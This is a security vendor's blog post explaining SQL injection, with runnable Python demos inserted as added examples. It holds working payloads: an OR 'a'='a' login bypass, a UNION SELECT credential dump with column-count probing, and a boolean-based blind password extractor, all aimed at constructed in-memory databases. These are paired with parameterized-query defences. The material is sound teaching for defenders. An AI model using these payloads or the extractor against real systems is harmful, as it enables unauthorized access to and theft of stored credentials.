Threat Intelligence • June 29, 2022
Databases are everywhere - from banking systems to grocery stores, healthcare and social media websites, they sit at the heart of almost every application in use today. Because they are such essential components of the modern business, they are also attractive targets for attackers. A common issue faced by websites and web applications that use these databases is SQL injection, or SQLi.
In this blog, we’re breaking down SQLi attacks - what they are, how they work, and how you can prevent them. Keep reading to learn more.
The standard language for working with relational database management systems (DBMS) is Structured Query Language, or SQL. It is used to store, manipulate, and retrieve data from databases.
An SQL injection is a type of vulnerability that lets attackers tamper with the database queries an application makes, allowing them to read, modify or delete existing data. Attackers exploit these vulnerabilities to trick the application into executing attacker-controlled SQL. They can then extract data that is normally inaccessible - such as data that belongs to other users, and/or any other data the application's database account can reach.
The consequences of a successful SQLi attack include:
Take this query for example, where the application pastes the submitted user ID and password straight into the statement text (the two submitted values are shown as placeholders):
SELECT * FROM Users
WHERE userid = '<userid input>'
AND password = '<password input>';
This query depends on user inputs for its return value. Now, an attacker with the userid 'emma' could enter the password as
name' OR 'a'='a
The single quote after name closes the password string literal, so the rest of the input is parsed as SQL. The condition
'a'='a'
always evaluates to true, and because AND binds more tightly than OR, the WHERE clause becomes (userid = 'emma' AND password = 'name') OR 'a'='a', which matches every row. The query therefore behaves like:
SELECT * FROM Users;
The attacker can now bypass the authentication check and access all the entries in Users.
[Code sample source: OWASP]
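The bypass described above, run end to end against an in-memory SQLite database. This is an added example, not code from the original post or from OWASP; the Users rows are constructed for the demo, and the passwords are stored in plaintext only to keep the focus on the query text (a real application would compare password hashes).

```python
import sqlite3


def build_db():
    # Constructed demo data, not from the original post.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Users (userid TEXT, password TEXT);
        INSERT INTO Users VALUES ('emma', 'correct horse'), ('admin', 'hunter2');
        """
    )
    return conn


def build_login_query(userid, password):
    # Dynamic SQL: the submitted values are pasted into the statement text,
    # so a quote inside the input ends the string literal and everything
    # after it is parsed as SQL.
    return (
        f"SELECT * FROM Users WHERE userid = '{userid}' "
        f"AND password = '{password}';"
    )


def vulnerable_login(conn, userid, password):
    # Returns the matched rows; the application would treat any row at all
    # as a successful login.
    return conn.execute(build_login_query(userid, password)).fetchall()


# The payload from the post: closes the literal, then appends an always-true OR.
BYPASS_PASSWORD = "name' OR 'a'='a"

if __name__ == "__main__":
    conn = build_db()
    print(build_login_query("emma", BYPASS_PASSWORD))
    print(vulnerable_login(conn, "emma", "wrong"))           # []
    print(vulnerable_login(conn, "emma", BYPASS_PASSWORD))   # every row in Users
```

Printing the assembled query is the quickest way to see the precedence problem: the WHERE clause reads userid = 'emma' AND password = 'name' OR 'a'='a', and the OR makes the whole condition true for every row.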
In an in-band SQL injection attack, the attacker uses the same communication channel to launch the attack and to collect the results. It is the most common mode of attack. In-band SQLi can be error-based or union-based.
Error-based SQLi attacks make the database raise errors whose messages, when the application displays them, reveal information about the database, such as the DBMS version or table and column names, or even query results. Union-based SQLi attacks use the SQL UNION operator to merge the results of the application's own SELECT with an attacker-supplied SELECT. The combined result is returned as part of the normal HTTP response.
Consider the following query:
SELECT country, city FROM location;
An attacker who can inject into this query can append the following union injection:
UNION SELECT username, password FROM users;
This works only if the injected SELECT returns the same number of columns, with compatible types, as the original (here two). The application then returns the combined results from the location and users tables, and the attacker reads every username and password out of the page.
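The union-based attack above, carried out against an in-memory SQLite database, including the step the text mentions but does not show: establishing how many columns the original query returns before the UNION will parse. This is an added example, not code from the original post; the location and users rows are constructed for the demo, and the cities_in function is a hypothetical vulnerable endpoint.

```python
import sqlite3


def build_db():
    # Constructed demo data, not from the original post.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE location (country TEXT, city TEXT);
        INSERT INTO location VALUES ('France', 'Paris'), ('Japan', 'Tokyo');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('emma', 'correct horse'), ('admin', 'hunter2');
        """
    )
    return conn


def cities_in(conn, country):
    # Vulnerable: the filter value is concatenated into the query text.
    sql = f"SELECT country, city FROM location WHERE country = '{country}'"
    return conn.execute(sql).fetchall()


def find_column_count(conn, max_cols=8):
    # Step 1 of a union attack: a UNION only parses when both SELECTs return
    # the same number of columns, so add NULL columns until the error stops.
    # NULL is used because it is compatible with every column type.
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ", ".join(["NULL"] * n) + "--"
        try:
            cities_in(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_credentials(conn):
    # Step 2: with two columns known, replace the NULLs with the target
    # columns. The empty country matches nothing, so only users rows come
    # back, and the trailing -- comments out the original closing quote.
    payload = "' UNION SELECT username, password FROM users--"
    return cities_in(conn, payload)


if __name__ == "__main__":
    conn = build_db()
    print(find_column_count(conn))   # 2
    print(dump_credentials(conn))    # the users table, served as "cities"
```

The comment marker is DBMS-specific: SQLite and PostgreSQL accept a bare `--`, while MySQL requires whitespace after it (`-- `) or the `#` marker, which is one reason injection payloads are tuned per backend.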
Inferential SQL injection, also known as blind SQL injection, is an equally dangerous type of SQLi attack. The attacker cannot see query results directly: the application's response contains no data from the database, so the attacker must infer it one true/false question at a time. Blind SQLi attacks can be boolean-based or time-based.
In a boolean-based attack, the attacker injects a condition that changes whether the query matches anything. The HTTP response differs depending on the boolean result (TRUE or FALSE): if the page returned for the injected true condition differs from the page returned for a false condition, the attacker knows the injection works and can use that difference to read data bit by bit.
In a time-based attack, the attacker injects a statement that makes the database pause (for example a sleep or delay function) only when a condition is true. The response time of the request then reveals whether the condition was true or false, which is useful when the page content does not change at all.
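A boolean-based blind extraction against an in-memory SQLite database, showing how one true/false answer per request is enough to recover a secret. This is an added example, not code from the original post; the products and users rows are constructed for the demo, product_page is a hypothetical vulnerable endpoint, and the secret is the admin password. The time-based variant is the same loop with the page difference replaced by a delay (MySQL SLEEP(), PostgreSQL pg_sleep(), SQL Server WAITFOR DELAY); it is not shown because SQLite has no sleep function.

```python
import sqlite3


def build_db():
    # Constructed demo data, not from the original post.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'anvil'), (2, 'rope');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret!');
        """
    )
    return conn


def product_page(conn, product_id):
    # Vulnerable endpoint: the id is injected unquoted, and the only thing
    # the response reveals is whether the query matched a row.
    sql = f"SELECT name FROM products WHERE id = {product_id}"
    row = conn.execute(sql).fetchone()
    return "Product found" if row else "No such product"


# Scalar subquery the attacker wants to read, one character at a time.
SECRET = "(SELECT password FROM users WHERE username = 'admin')"


class Oracle:
    # Wraps the page so the attack can count how many "requests" it needs.
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        return product_page(self.conn, "1 AND " + condition) == "Product found"


def extract_secret(oracle, max_len=64):
    # Length first: probe length(secret) = n until the page says "found".
    length = next(n for n in range(max_len + 1)
                  if oracle.ask(f"length({SECRET}) = {n}"))
    # Then bisect each character's code point over printable ASCII (32..126):
    # about 7 requests per character instead of one per candidate character.
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"unicode(substr({SECRET}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    oracle = Oracle(build_db())
    print(extract_secret(oracle), "recovered in", oracle.requests, "requests")
```

The request count is the point for defenders: a seven-character secret leaks in well under a hundred requests, each of which looks like an ordinary product lookup, so rate limiting alone is a weak control and the underlying query must be fixed.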
Listed below are some steps you can take to minimize the risk of SQL injection attacks on your website or web application:
Building SQL statements dynamically by concatenating user input into the query text is what makes an application or website vulnerable to SQL injection.
All database queries should be written as prepared statements with parameterized queries. The query text is fixed and contains placeholders; the user-supplied values are bound separately, so the database engine always treats them as data and never as SQL code. Note that placeholders can only carry values, not identifiers such as table or column names, so anything of that kind that comes from the user must be checked against an allow-list.
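The hardened version of the login query from earlier in the post, using a parameterized query against an in-memory SQLite database, plus an allow-list for the one case placeholders cannot cover, a user-chosen sort column. This is an added example, not code from the original post; the Users rows are constructed for the demo, and the passwords are stored in plaintext only to keep the focus on the query (a real application would compare password hashes).

```python
import sqlite3


def build_db():
    # Constructed demo data, not from the original post.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Users (userid TEXT, password TEXT, created INTEGER);
        INSERT INTO Users VALUES ('emma', 'correct horse', 1), ('admin', 'hunter2', 2);
        """
    )
    return conn


def safe_login(conn, userid, password):
    # Prepared statement: the SQL text is fixed and holds only placeholders.
    # The values travel to the engine separately, so a quote or an OR inside
    # the password is compared as characters, never parsed as SQL.
    sql = "SELECT userid FROM Users WHERE userid = ? AND password = ?"
    return conn.execute(sql, (userid, password)).fetchall()


# Identifiers cannot be parameterized, so a user-chosen sort column is
# accepted only if it is one of these known column names.
SORTABLE_COLUMNS = {"userid", "created"}


def sort_column_allowed(sort_by):
    return sort_by in SORTABLE_COLUMNS


def list_users(conn, sort_by):
    if not sort_column_allowed(sort_by):
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    # Safe to interpolate: sort_by is now one of our own literals, not input.
    rows = conn.execute(f"SELECT userid FROM Users ORDER BY {sort_by}")
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = build_db()
    print(safe_login(conn, "emma", "correct horse"))    # [('emma',)]
    print(safe_login(conn, "emma", "name' OR 'a'='a"))  # []
    print(list_users(conn, "created"))                  # ['emma', 'admin']
```

The same bypass payload that returned every row from the dynamic query now matches nothing, because the engine looks for a password literally equal to name' OR 'a'='a. The allow-list handles the residual risk: ORDER BY, LIMIT, and table names are common places where developers fall back to string formatting, and a fixed set of accepted values is the correct control there.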
Regular penetration testing of your web applications and the databases behind them can expose weaknesses such as XSS, injection flaws, weak passwords, and unpatched vulnerabilities. It also shows how well your defenses hold up against different types of attacks, SQL injection included. Regularly auditing your database for suspicious activity adds a further layer of protection.
For applications that are connected to databases, it is important to log and monitor the SQL statements the application issues. With that visibility, unauthorized or unexpected SQL statements, and the vulnerabilities behind them, are much easier to spot.
Attackers can take advantage of verbose error messages to learn about the database structure, such as table and column names or the DBMS product and version. Configure the application so that detailed errors are shown only locally: in ASP.NET, for example, the "RemoteOnly" customErrors mode shows full error details to requests from the local machine and a generic error page to everyone else, and other frameworks have an equivalent setting. Record the full error in server-side logs instead of sending it to the client.
SQLi remains one of the most common web application attack vectors today, with some industry reports attributing more than half of all web application attacks to it. And because most websites rely on data stored in a database server, a successful SQL injection attack can be damaging for your business and your customers. Test your IT infrastructure for vulnerabilities including SQLi with Evolve's Automated Penetration Testing services. Our specialists use years of experience with deep expertise and up-to-date tools to find security flaws faster and effectively reduce your risk of being exploited.
Schedule a session with our team to evaluate your SQL security posture right away.